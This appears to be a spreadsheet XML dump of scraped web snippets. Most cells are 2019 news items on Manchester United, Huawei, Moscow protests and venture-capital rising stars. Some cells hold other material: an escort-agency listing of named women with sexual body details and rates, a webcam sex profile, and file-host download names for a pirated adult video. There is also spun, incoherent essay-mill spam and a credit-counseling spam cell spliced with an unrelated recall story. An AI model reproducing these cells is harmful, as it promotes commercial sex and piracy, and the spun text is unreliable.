    <t>Juan Mata has scored 45 goals in 218 appearances for Manchester United Manchester United midfielder Paul Pogba is a “positive influence” who “brings everyone together” at the club, says team-mate Juan Mata. There has been speculation about Pogba’s Old Trafford future after he spoke of finding “a new challenge” in June, while his agent has said the France international wants to leave. But pre-season has been going well for the squad, said Spaniard Mata. “He’s a fantastic midfielder and he’s a very good guy,” the 31-year-old added. “I think he’s happy.” Earlier in July, United manager Ole Gunnar Solskjaer also said Pogba has “never been a problem” and claimed there is an “agenda” against the player. Mata wants 26-year-old Pogba’s future to include helping the club to start lifting “big trophies” under Solskjaer, after two seasons without winning anything. “Obviously as a team-mate, and as a friend also, I would like him to stay and to be happy because he is a very good player for us,” the 31-year-old Spain international, who signed a two-year contract in June. “We know we have to do better than last season. This club has won more trophies than any other club in England.” United have not won the Premier League since 2013, the year Sir Alex Ferguson retired, and their last major trophy was the Europa League in May 2017 under Jose Mourinho – three months after winning the Carabao Cup. Solskjaer is Mata’s fifth manager at Old Trafford – an amazing statistic given the club prided itself on stability under Ferguson, who was manager for 26 and a half years. David Moyes was in charge when the midfielder joined United from Chelsea for a then club record £37.1m in January 2014 and he has since served under Ryan Giggs, Louis van Gaal, Mourinho and Solskjaer. Fans ‘win games’ for Man Utd – Mata “The feeling of being a Manchester United player is so unique,” added Mata, who committed his future to United despite receiving lucrative offers to move elsewhere. “I am very happy to stay here. I am dreaming about winning big trophies at this club. That is what the fans deserve. “We want to win big trophies again. That is what the history of this club deserves.” United finished sixth in 2018-19, which means they will play in the Europa League this season. However, Mata decided to stay and fellow Spaniard, goalkeeper David de Gea, is also on the brink of signing a long-term deal. “David is the best or one of the best goalkeepers in the world, for sure,” Mata said. “He is one of my best friends, so I want him to stay. On a professional level, it will be great for us if he stays because he will give us many points over the next seasons.” Midfielder Ander Herrera has moved on, though, joining Paris St-Germain after his Old Trafford contract expired. Solskjaer is keen to introduce more youngsters into the first-team squad during 2019-20. Teenage striker Mason Greenwood has been guaranteed a future by the Norwegian and added to his growing reputation on Saturday when he scored the winner against Inter Milan in the pre-season International Champions Cup in Singapore. “Mason has a lot of qualities and the most important one is his mentality,” added Mata. “He’s hungry to improve and to give his all for the team. “We are very happy he’s finding his feet in the first team and gaining confidence. I am sure he’ll score many goals for this club.”</t>
  </si>
  <si>
    <t>Welcome to escorts in Sampford Peverell EX16, covering the whole area of Devon. We have escorts serving the flats, homes and local hotels in Sampford Peverell and the surrounding Devon areas. Sampford Peverell Escort Devon Escort Services Sampford Peverell Escorts - Girls Who Know How to Fulfill You in Devon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Sampford Peverell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To achieve your dreams, you should continuously look for various options to realize them. One of the options where you can shine is when there is an important even like annual office day, or your company has organized a special event where a lot of visitors are visiting your office from different branches. To impress your superiors and bosses, you might want to suggest them a great idea of hiring Sampford Peverell escorts for the guests visiting in the company event. Your guests will surely be impressed and would feel esteemed when they would meet these stunning escort girls. Hiring the services of these Sampford Peverell escort girls will surely turn out to be great since these stunning beauties will cater to the needs of the visitors and make your guests feel outstanding and comfortable at the same time. After the party, you can request for exceptional massage service for these visitors or guests. Escorts in Sampford Peverell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Sampford Peverell,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Larissa Location: Sampford Peverell (EX16 7) Nationality: Welsh Spoken Language: English, Spanish Age: 35 years old Weight: 66.4kg (146lb) (10st - 6lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 42 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Hazel Breast: Natural Breast Size: J Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Larissa Escort Name: Eliza Location: Sampford Peverell (EX16 7) Nationality: Romanian Spoken Language: English, Portuguese Age: 22 years old Weight: 48.6kg (107lb) (7st - 9lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 39 Hair Leigh: Long Hair Color: Black Eye Color: Brown Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Eliza Escort Name: Malory Location: Sampford Peverell (EX16 7) Nationality: Dominican Spoken Language: English, Portuguese Age: 23 years old Weight: 61.4kg (135lb) (9st - 9lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 39 Hair Leigh: Very Long Hair Color: Brunette Eye Color: Blue Breast: Natural Breast Size: C Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: Yes Drinking: No Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Malory Escort Name: Naomi Location: Sampford Peverell (EX16 7) Nationality: English Spoken Language: English, German Age: 24 years old Weight: 60.9kg (134lb) (9st - 8lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 39 Hair Leigh: Very short Hair Color: Blonde Eye Color: Violet Breast: Natural Breast Size: F Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Naomi Escort Name: Monique Location: Sampford Peverell (EX16 7) Nationality: Indian Spoken Language: English, Portuguese Age: 19 years old Weight: 51.8kg (114lb) (8st - 2lb) Height: 5 feet 8 inches (172.72cm) Dress Size: S Shoe Size: 39 Hair Leigh: Medium-Length Hair Color: Black Eye Color: Blue Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Yes Drinking: No Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Monique Escort Name: Alessia Location: Sampford Peverell (EX16 7) Nationality: South African Spoken Language: English, Korean Age: 26 years old Weight: 53.2kg (117lb) (8st - 5lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 43 Hair Leigh: Medium-Length Hair Color: Brunette Eye Color: Amber Breast: Silicone Breast Size: C Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: No Smoking: Yes Drinking: Yes Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Alessia Escort Name: Paulina Location: Sampford Peverell (EX16 7) Nationality: American Spoken Language: English, French Age: 48 years old Weight: 52.3kg (115lb) (8st - 3lb) Height: 5 feet 11 inches (180.34cm) Dress Size: S Shoe Size: 42 Hair Leigh: Long Hair Color: Brunette Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: Occasionally Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Paulina Escort Name: Luciana Location: Sampford Peverell (EX16 7) Nationality: Belgian Spoken Language: English, Italian Age: 23 years old Weight: 55.9kg (123lb) (8st - 11lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 42 Hair Leigh: Short Hair Color: Black Eye Color: Gray Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Luciana Escort Name: Xena Location: Sampford Peverell (EX16 7) Nationality: Croatian Spoken Language: English, Japanese Age: 20 years old Weight: 57.3kg (126lb) (9st - 0lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 40 Hair Leigh: Medium-Length Hair Color: Bronde Eye Color: Red Breast: Natural Breast Size: G Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: Yes Smoking: No Drinking: No Availability Area: Sampford Peverell Outcall: Devon Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Xena Sampford Peverell Independent Escort, Sampford Peverell Spanish Escort, Sampford Peverell Polish Escort, Sampford Peverell Horny Escort, Sampford Peverell Gay Escort, Sampford Peverell Black Escort, Sampford Peverell Chinese Escort, Sampford Peverell Best Escort, Sampford Peverell Agency Escort, Sampford Peverell Busty Escort, Sampford Peverell Teen Escort, Sampford Peverell Irish Escort, Sampford Peverell Brunette Escort, Sampford Peverell Mature Escort, Sampford Peverell Cheap Escort, Sampford Peverell Brazilian Escort, Sampford Peverell Porn Escort, Sampford Peverell Bisexual Escort, Sampford Peverell Female Escort, Sampford Peverell British Escort, Sampford Peverell French Escort, Sampford Peverell Outcall Escort , Sampford Peverell Indian Escort, Sampford Peverell Ebony Escort, Sampford Peverell Indian Escort, Sampford Peverell Scottish Escort, Sampford Peverell Blonde Escort, Sampford Peverell Asian Escort, Sampford Peverell Incall Escort, Sampford Peverell Erotic Escort, Sampford Peverell Walsh Escort, Sampford Peverell Male Escort, Sampford Peverell Young Escort, Sampford Peverell Massage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Sampford Peverell appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>My Kinks: Treat me like a lady and I will be your little mir Webcam profile: I am romantic woman with shy dreams and hopes. One day maybe I will visit New York, have beautiful adventures and find the right guy! Favourite sex position: If you need a hot show then feel free to join me and I make your wishes come true. The pleasure is guaranteed What I do in my amateur show: I like men who are self-confident enough to not be afraid of a strong woman. Be that man and I will fulfill all your expectations What I don’t like: I do not like to be bored. Come and play with me if you are brave enough Gallery</t>
  </si>
  <si>
    <t>Disruption for rail and air passengers will continue after Thursday's record-breaking temperatures. The post UK heatwave: More delays for travellers despite temperatures easing appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>The Meaning of Debatable Topics for Research Papers It’s always challenging to make the very first step without a guideline. You can select one aspect or offer an elaborate analysis. Combining techniques and styles in a specific place or period of time is a typical approach to come up with a more complicated research topic. Who Else Wants to Learn About Debatable Topics for Research Papers? The last write-up ought to be concise with firm language. If you wish to learn how to write great essays on sociology, just take the subsequent steps. You have to understand completely that grademinders you’re not writing a descriptive essay. As any guide on how best to compose a persuasive essay will inform you, your essay has to be organized in paragraphs with a logical progression from 1 paragraph to the next. An argumentative essay is a certain sort of academic writing. All the TOEFL essay topics were composed of precisely the specific same function in your thoughts. Details of Debatable Topics for Research Papers If you still feel you need help, even if you’ve managed to opt for a topic, you may always employ a custom writing service that will help you produce a fabulous research paper of which you’ll be proud and will guarantee you a nice mark. During the duration of your college career, you will probably be assigned to compose a research paper. Writing a research paper is stressful enough, and making up a fantastic topic idea can be extremely stressful. As your work progresses, you will discover yourself more into it, and you are going to be in a position to enjoy it. If you’re able to pick a topic that is relevant to your life, you’ll discover that you are better focused on completing the job. Remember about time! Deciding on your topic isn’t that easy. Selecting a superb topic may not be simple. Usage of health marijuana. Chemistry papers can be challenging, not due to the topic, but due to selecting the topic. Moral argumentative essay topics are a few of the simplest to get carried away with. What Is So Fascinating About Debatable Topics for Research Papers? The best strategies to accept the society and allow it to be accept you. There are lots of things to argue when it has to do with the law. It’s exciting because a debate is just one of the very first time you get to have the joy of persuading someone your opinion is appropriate. The Nuiances of Debatable Topics for Research Papers Choosing research that’s appropriate to the point you’re making is equally as crucial as providing substantial info on the subject. Conventional ways and way of marketing continue to be superior in comparison with digital marketing. Possessing excellent research abilities and selecting a great topic is essential. A related problem to connecting the key points to the thesis statement is failing to offer adequate and appropriate support for those assertions made in the customized research paper. Regardless of the kind of claim you decide to utilize it’s important to recognize the controversy or debate you’re addressing and to define your position early on in the paper. The broader your claim is, the more evidence that you’ll need to convince readers your position is perfect. The social network has altered the fashion in which young folks talk to their buddies, teachers, parents, and the way in which they utilize or interact with technology. Click the read more to get There is a great deal of heated debate on a lot of health issues not just in United States of america, but also in different areas of the world. There are varying views on whether or not a college education is necessary in order to have a prosperous life. New Questions About Debatable Topics for Research Papers When you’re prepared to think of a thesis, have a look at these Argumentative Thesis Statement Examples. To start, many students encounter issues with the research paper because they don’t fully review all the information available. To begin with, make sure that your subject isn’t too broad or else you will have a challenging time revealing it. You still have to make an outstanding bit of writing. Much like any paper, the subject of your choice is an amazingly important thing.</t>
  </si>
  <si>
    <t>Talissa Siganto</t>
  </si>
  <si>
    <t>Police searching for Simone Rothe, who went missing about two weeks ago south of Brisbane, find a body in bushland at Slacks Creek.</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/7/30/20732061/mediatek-helio-g90-g90t-mobile-chip-cpu-gpu-specs-features MediaTek announces flagship gaming-focused Helio G90 mobile chips Taiwanese chip manufacturer MediaTek has announced its latest flagship processors, the Helio G90 and G90T. The chips include an octa-core CPU clocked at up to 2.05GHz, which uses the same ARM Cortex-A76 and A55 cores as the latest flagship processors from Qualcomm and Huawei. MediaTek’s chip also includes a Mali G76 GPU with speeds of up to 800MHz and support for up to 10GB of LPDDR4x RAM. The G90 and G90T are the first SoCs (system on a chip) in MediaTek’s gaming-focused G-Series lineup. They include what the company calls its “HyperEngine” technology, which consists of several features that are designed to boost the performance of smartphone games. The chips support HDR10, and they also have an intelligent network prediction engine… Continue reading… Source: https://www.theverge.com/2019/7/30/20732061/mediatek-helio-g90-g90t-mobile-chip-cpu-gpu-specs-features The post MediaTek announces flagship gaming-focused Helio G90 mobile chips appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>The Integrated Homicide Investigation Team (IHIT) is requesting public assistance to identify a key witness in the stabbing death of a 42-year-old Richmond man. Richmond: On July 23, at around 2 p.m., an argument between two men ensued on board a Coast Mountain bus near No3 Road and Cambie Road in Richmond, B.C. resulting in one of the men being fatally stabbed. IHIT took conduct of the investigation and continues to complete priority tasks. Investigators have reviewed the video surveillance footage inside the bus and have identified a passenger who may have important information about the altercation. This passenger is described as an Asian female wearing sunglasses, a dark hat, white jacket, blue pants and carrying a black purse (photograph attached). “Let us be clear that the woman in the photograph is not under investigation but is rather a potentially crucial witness of the altercation,” says Sergeant Frank Jang of IHIT. “If you recognize her, please have her contact IHIT immediately. We also urge any other passengers who have still not spoken to police to come forward.” Anyone with information is asked to call the IHIT information line at 1-877-551- IHIT (4448).</t>
  </si>
  <si>
    <t>One, Two or Four RFID Blocking Card Wallets This cardholder can help to organize and safely store up to 36 cards and bank cards and features a safety zip The post One, Two or Four RFID Blocking Card Wallets appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>A MAJOR change to a common driving law could now see motorists lose their driving licence due to the additional punishment of penalty points being added. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>Tall Books</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V In this video I take you through reconciling bank accounts in Xero. How to use BankFeeds, create spend/receive money, matching transactions and fixing errors. source</t>
  </si>
  <si>
    <t>mtubi</t>
  </si>
  <si>
    <t>It's Xmas in July at Ubisoft Store! Get 20% off your order this week as a mid-year gift to yourself! Grab a discount on all back catalogue including Trials Rising, Far Cry New Dawn, The Division 2 and Anno 1800. Offer ends 31st July 2019. Code can be used once per customer. Can't be combined with Ubisoft Club discount codes. Excludes pre-orders and in-game credits.</t>
  </si>
  <si>
    <t>Darren Gray</t>
  </si>
  <si>
    <t>BHP's landmark move to push its customers to reduce their greenhouse gas emissions is tipped to be followed by others</t>
  </si>
  <si>
    <t>Russian police cracked down hard on demonstrators in central Moscow, beating some and arresting hundreds of others protesting the exclusion of opposition candidates from the September ballot for Moscow city council. CBC | World News</t>
  </si>
  <si>
    <t>From the moment the Leagues Cup was announced in late May, the potential appeal was obvious. But this week’s quarterfinals show us there may be some limits to the tournament’s appeal, at least in its current form. Source: Sports Business News</t>
  </si>
  <si>
    <t>Jenne Brammer</t>
  </si>
  <si>
    <t>Pinjarra Fish and Chips and Albany’s Ocean and Paddock were served up trophies at the WA seafood industry awards.</t>
  </si>
  <si>
    <t>The ballots are in and the votes are being counted. Bar a last-minute shock, Boris Johnson will be announced the new Conservative leader and presumptive prime minister just before midday. Read more? Click here</t>
  </si>
  <si>
    <t>Foyle’s War is the show Britons most miss according to a UK poll. The wartime detective drama topped a list of shows in a survey conducted by Radio Times. Second place went to police drama The Bill followed by spy drama Spooks. Top 10 Most Missed TV Show of 21st Century: Foyle’s War, ITV, 2002—15 The Bill, ITV, 1984—2010 Spooks, BBC1 2002–2011 Count Arthur Strong, BBC2/BBC1, 2013-17 Home Fires, ITV, 2015-16 Life On Mars, BBC1, 2006—7 Detectorists, BBC Four, 2014-17 Downton Abbey, ITV, 2010-2015 Phoenix Nights, C4, 2001-2 Happy Valley, BBC 1, 2014-16 Foyle’s War writer Anthony Horowitz said he would be up for writing “one or two” Foyle’s War Christmas specials – or potentially a whole new series. “I’d certainly be up for a Christmas special or two if anybody asked,” he told Radio Times, before addressing the “missing year” of 1944. “It would actually make a whole series!” “Foyle’s War was a passion project for me from start to finish and I miss it to this day. It really cheers me up to think that Radio Times readers still hold it in such high regard,” Horowitz said. “I wrote the last episode of Foyle’s War in 2014, but no matter where I am in the world, people still tell me how much it means to them. And the repeats still get high viewing figures.”</t>
  </si>
  <si>
    <t>James Massola</t>
  </si>
  <si>
    <t>Up to 13 people are believed to be facing imminent execution, but the Singapore government is tight lipped.</t>
  </si>
  <si>
    <t>pete1812</t>
  </si>
  <si>
    <t>6 piece pot set, I had been looking at these 2 weeks ago when they were on sale for $125! Now on sale for $49.95, can’t even steal em for that cheap!</t>
  </si>
  <si>
    <t>Bruce MacKenzie</t>
  </si>
  <si>
    <t>A magistrate who found a Nimbin Mardi Grass festival worker not guilty of drug driving has blasted the NSW Government's advice to motorists, saying it "lulls them into a false sense of security".</t>
  </si>
  <si>
    <t>Dundee video games students will battle it out for a whopping £5,000 cash prize.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Russian regulator says 19,696 Peugeot and Citroen cars recalled Friday 19 July 2019 11:39 PM UTC-05 https://firmadeabogadosmedellin.blogspot.com/p/philadelphia-pennsylvania-consumer.html Russia’s standards agency said on Tuesday it had been informed about the voluntary recall of 19,696 Peugeot and Citroen cars sold between February 2008 and September 2014.</t>
  </si>
  <si>
    <t>InnocentHigh – Alice Green – You Watch My Back And I'll Watch Yours Model(s): Alice Green Released Date: June 26, 2015 Size: 2.54 GB Quality: MPEG-4, 1080p, 00:30:08 rapidgator:idolxx.com_062615.ih.alice.1080.mp4 uploaded:idolxx.com_062615.ih.alice.1080.mp4 mexashare:idolxx.com_062615.ih.alice.1080.mp4 katfile:idolxx.com_062615.ih.alice.1080.mp4</t>
  </si>
  <si>
    <t>SKY is back with a big new deal, an important new upgrade and more content in full 4K resolution. Daily Express :: Tech Feed Sky TV deals will slash your bill as new features and bonus content revealed</t>
  </si>
  <si>
    <t>Elderly Australians are frequently financially targeted by their families, while older LGBTI Australians argue they have no voice at all.</t>
  </si>
  <si>
    <t>China's Huawei Technologies said on Tuesday revenue in the first half of the year grew 23.2% - faster than a year ago - despite an intense U.S. campaign against it that ultimately became a trade ban from mid-May.</t>
  </si>
  <si>
    <t>Melanie Kembrey</t>
  </si>
  <si>
    <t>The Orange is the New Black star on motherhood, #MeToo and a life-changing role.</t>
  </si>
  <si>
    <t>In this video i will tell you about top 10 best places for tourism in Africa. These places are very famous and considered the best places of world to visit. Millions of people came these places every year only for tourism. Here is the list of top 10 best tourists attractions in Africa: 1. Giza […] The post 10 Best Places To Visit In Africa | Africa Travel Guide | appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Follow our Spotify playlist: http://trapcity.tv/Spotify Subscribe here: http://trapcity.tv/subscribe Download here: https://bit.ly/2YvW641 ➥ Become a fan of Trap City: http://trapcity.tv/Spotify http://trapcity.tv/soundcloud http://trapcity.tv/facebook http://trapcity.tv/twitter http://trapcity.tv/instagram http://www.trapcity.net ➥ Follow Barren Gates: https://www.facebook.com/BarrenGates https://www.instagram.com/barrengates #BarrenGates #Trap #TrapMusic #TrapCity The post Dutch Melrose ft. Lacey James – Ride 4 U (Barren Gates Remix) appeared first on Dubster.</t>
  </si>
  <si>
    <t>The Green Bay Packers invested heavily in free agent outside linebackers Preston Smith and Za’Darius Smith this offseason. Source: Sports Business News</t>
  </si>
  <si>
    <t>The appeal comes in the wake of a growing tent city on municipal property, including Victoria Park.</t>
  </si>
  <si>
    <t>General Motors Co's self-driving unit, Cruise, said on Wednesday it was delaying the commercial deployment of cars past its target of 2019 as more testing of the vehicles was required.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/dpOhPXhE4_Q/meet-venture-capital-25-rising-stars-in-silicon-valley-2019-7 Meet the 25 rising stars in venture capital coming of age during Silicon Valley’s longest bull run in recent history It’s never been better to be an investor in Silicon Valley, with blockbuster IPOs and direct listings returning a good profit to early startup investors. Some of Silicon Valley’s biggest names, like Andreessen Horowitz and Kleiner Perkins, have brought on new faces to help keep their edge during the longest market bull run in recent history. Meet the new faces of venture capital’s rising stars. While these individuals range in title and focus area, all have been working in venture capital for five years or less. Click here for more BI Prime stories. It seems that, in 2019, there’s never been a better time to be in venture capital. The first half of the year was marked by blockbuster public debuts and the continuation of privately funded mega-rounds. Funding events like these are making household names of Silicon Valley firms and the partners on the deals, not to mention a hefty profit. But as venture investors continue to look for the next big thing, many of the biggest firms are looking to younger partners and firm employees for help. So Business Insider asked those firms, what does the next generation of venture capital look like? These 25 rising stars are poised to make names for themselves in everything from biotech and enterprise security to scooter startups and media companies. While these individuals range in title and focus area, all have been working in venture capital for five years or less. Meet Business Insider’s 25 rising stars in venture capital. Read More: The legendary Andreessen Horowitz partner who worked on its Facebook and Airbnb deals shares his best advice for entrepreneurs trying to strike it big in Silicon Valley SEE ALSO: As tech valuations soar, early stage startups are increasingly turning to debt to raise cash Nina Achadjian, Principal at Index Ventures Nina Achadjian joined Index Ventures in 2017 from Google, where she previously led financial planning and analysis. At Index, Achadjian focuses on enterprise software investments that are taking on some of the biggest names in tech. She is also the founder of HIVE Ventures, a seed-stage investing firm that focuses on funding Armenian entrepreneurs. The Harvard University alum started her career in high frequency trading at Citigroup. Racquel Bracken, Vice President at Venrock Racquel Bracken joined Venrock as a Vice President in May 2016 to focus on investments in the pharmaceutical and healthcare industries. Prior to Venrock, Bracken was an early employee of Clovis Oncology, a biopharmaceutical company focused on small molecule therapies. The Harvard University grad started her career in investment banking at Easton Associations and Domain Associates. Annie Case, Investor at Kleiner Perkins Annie Case joined Kleiner Perkins in November after leading strategy and operations at Uber. Since joining Kleiner Perkins, Case has participated in the firm’s investment in Modern Health, a mental health provider startup. The Stanford alum joined Bain &amp; Company as a consultant in San Francisco after graduation, where she focused on private equity and technology. Josh Coyne, Investor at Kleiner Perkins Josh Coyne joined Kleiner Perkins in 2017 to invest in enterprise software and consumer internet companies. In the two years he has been at the firm, Coyne has participated in deals across mobile gaming, fintech, and mail-order dental care. Coyne, a Cleveland native, graduated from Boston College and worked for Qatalyst Partners prior to joining Kleiner Perkins. Frederique Dame, Partner at GV Frederique Dame joined GV, formerly known as Google Ventures, in 2018 to lead the corporate venture fund’s consumer investments. Prior to joining GV, Dame led product teams at Uber, photosharing startup SmugMug, photo social site Photobucket, and Yahoo. Dame angel invested in various startups before joining GV full time, and started her career as a financial analyst. Monica Desai, Investor at Kleiner Perkins Monica Desai joined Kleiner Perkins’ New York team in 2018 to focus on cryptocurrency, blockchain, and financial technology investments. The Harvard Business School alum splits her time between the Bay Area and New York to focus on Series B opportunities, and has participated in Kleiner’s investment in student loan management startup, Pillar. Mike Duboe, Principal at Greylock Partners Mike Duboe joined Greylock Partners, Reid Hoffman’s venture capital firm, in December to focus on investing in retail-specific artificial intelligence startups and media companies. Before joining the firm, Duboe led growth at fashion subscription startup Stitch Fix and saw the company through its IPO. Duboe has also advised entrepreneurs through accelerator Y Combinator. The University of Michigan grad started his career at Bain &amp; Company. Megan Holston-Alexander, Senior Associate at Unusual Ventures Megan Holston-Alexander joined Unusual Ventures, an early-stage technology investment firm, in April 2018 to help build the firm’s consumer investing practice. The Stanford Business School grad interned with Lightspeed Venture Partners, YouTube, and Foundation Capital before joining the Unusual Ventures team. She graduated from Clark Atlanta University and received her masters in sociology from the University of Houston. Fatima Husain, Principal at Comcast Ventures Fatima Husain joined Comcast Ventures, the corporate venture capital arm of telecom giant Comcast, in May to lead the fund’s early stage investments consumer internet startups. According to her LinkedIn account, Husain is particularly focused on healthcare startups and solutions for sharing economy workers. Prior to joining Comcast Ventures, the Yale University grad led product growth at vacation rentals startup Airbnb. Zak Kukoff, Associate at Emergence Capital Zak Kukoff joined Emergence Capital in April 2018 to focus on developer tools and future of work for the enterprise software focused firm. Kukoff is a serial entrepreneur and was the youngest founder ever backed by startup incubator TechStars when he went through the program in 2011 at 16 years old. Since then, he’s founded Autism Ambassadors, published a book, and was honored by the Clinton Global Initiative. Peter Lauten, Deal Partner at Andreessen Horowitz Peter Lauten joined Andreessen Horowitz in May 2016 as a deal partner focused on enterprise applications. He has sourced, diligenced, and supported a variety of the firm’s investments, including email management tool Superhuman, customer management tool People.ai, and legal startup Atrium, among others. Prior to Andreessen Horowitz, the Duke University alum was an investment banking analyst at Deutsche Bank. Aneesha Mehta, Principal at Bain Capital Ventures Aneesha Mehta joined Bain Capital Ventures in 2017 to focus on healthcare investing. In her current role, Mehta works across all aspects of the investment process including sourcing, due diligence, transaction execution, and portfolio company support. Mehta spent 3 years as a public equities investor at Fidelity Investments in Boston before joining Bain Capital. Before Fidelity, The Brown University alum spent time interning in healthcare consulting at Decision Resources Group and in a strategy role at a mobile healthcare startup in India. Cherry Miao, Vice President of Growth at Accel Cherry Miao joined Accel from portfolio company Lightspeed HQ in October to focus on financial technology, machine learning, and future of retail startups. She was an early employee at payments startup Lightspeed HQ and helped the company scale from 60 to 600 by spearheading two major international acquisitions and raising more than $250 million in venture funding. The Harvard alum began her career in private equity. Alex Pruden, Deal Partner at Andreessen Horowitz Alex Pruden joined Andreessen Horowitz as a deal partner for its crypto fund in April. Prior to arriving in Silicon Valley, Pruden spent nearly 10 years in the United States Army Infantry &amp; Special Forces and completed three tours in the Middle East. According to the West Point graduate, his experience working side-by-side with oppressed communities in Afghanistan, Iraq, and Syria was the inspiration for his career transition into crypto. Andrew Reed, Partner at Sequoia Capital Andrew Reed joined Sequoia in 2014 to focus on growth-stage investing across consumer, enterprise software, and fintech. He was involved with Sequoia’s 2015 Series B investment in open source tool GitHub, and over the last 12 months has led Sequoia’s investments in travel startup Tourlane and design tool Figma. Prior to Sequoia, The Amherst College alum worked at Goldman Sachs. Brian Rothenberg, Partner at Defy.vc Brian Rothenberg joined Defy.vc, an early-stage venture capital firm, after leading customer acquisition at events startup Eventbrite. Rothenberg is not new to investing, having angel invested in several startups during his tenure in Silicon Valley and scouted startups for Y Combinator, Sequoia Capital, and First Round Capital, but will bring operational expertise to Defy.vc’s growing portfolio of consumer and enterprise startups. Vivek Saraswat, Investor at Mayfield Vivek Saraswat joined Mayfield in July 2018 to focus on early-stage enterprise software and infrastructure startups. In a July 1 blog post reflecting on his first year as an investor, Saraswat compared his role to the fictional Alfred of the Batman comic series, describing himself as “using experience and values as a guide while quietly working in the background to get things done.” Prior to joining Mayfield, Saraswat led product development at infrastructure startup Docker, VMWare, and Amazon Web Services. Julia Schottenstein, Principal at NEA Julia Schottenstein joined NEA in 2016 and has since sourced and led NEA’s investments in open source enterprise startup Metabase and identity startup UnifyID. In addition to serving on the board of those two companies, the Stanford alum also serves on the board of threat detection startup Sentry, and was involved in several other investments across the firm. She joined NEA after starting her career as an analyst at several financial firms in Switzerland, New York, and California’s Bay Area. Philipp Seifert, Senior Associate, Sapphire Ventures Philipp Seifert joined Sapphire Ventures as a member of the growth investment team in 2017 to analyze and perform due diligence on new investments. Seifert worked on several of Sapphire’s data analytics investments, such as DataRobot, InfluxData, Matillion, Phoenix Labs, project44, and Reonomy. Prior to joining Sapphire Ventures, the Rice University grad worked on IPOs and M&amp;A at Goldman Sachs. Carlotta Siniscalco, Senior Associate at Emergence Capital Carlotta Siniscalco joined the Emergence Capital investing team in 2018 and was named a Kauffman Fellow, a prestigious 2-year leadership program for venture capital investors, in June. She focuses on insurance and fintech startups at Emergence in addition to advising on international investments. Siniscalco graduated from University of Pennsylvania’s Wharton School and received her MBA from Stanford Business School before going to Goldman Sachs as an analyst. Amy Sun, Partner at Sequoia Capital Amy Sun joined Sequoia Capital in February 2018 to invest in growth-stage startups in the autonomous driving and wellness industries. Before joining Sequoia, Sun held product marketing roles at some of the biggest names in technology like Microsoft and Facebook. She was also an early employee at Uber where she worked on driver growth, international expansion, and marketplace pricing. Stephanie Terpening, Senior Associate at Accel Stephanie Terpening joined Accel in July 2018 and focuses on enterprise software and security business investments. She has worked on Accel’s investments in insurance startup The Zebra and international payments startup WorldRemit. The Notre Dame University grad and former Rent the Runway intern came to Accel from Financial Technology Partners in San Francisco. Louisa Xu, Partner at IVP Louisa Xu joined IVP in October to invest in later stage consumer and enterprise startups. During her tenure, Xu has become actively involved in developer tool startup Harness, real estate startup Compass, and scooter rental company Lime, among others. Before joining IVP, Louisa was part of the investment team at GIC. The Harvard Business School alum began her career in private equity at Goldman Sachs and Blackstone before moving to infrastructure startup Cloudflare. Julie Yoo, Partner at Andreessen Horowitz Julie Yoo focuses on digital health investments at Andreessen Horowitz and is a Young Global Leader with the World Economic Forum. Prior to joining Andreessen Horowitz earlier this year, Yoo cofounded biotech startup Kyruus. Yoo has been active in the healthcare industry since studying pre-medicine at MIT, and has led product development at Generation Health, later acquired by CVS Health, and genome sequencing startup Knome. David Zhang, Vice President at TCV David Zhang joined growth firm TCV in August to focus on investing in later-stage consumer startups in media, financial tech, and entertainment. Zhang graduated from the London School of Economics and Political Science and shortly after founded his own real 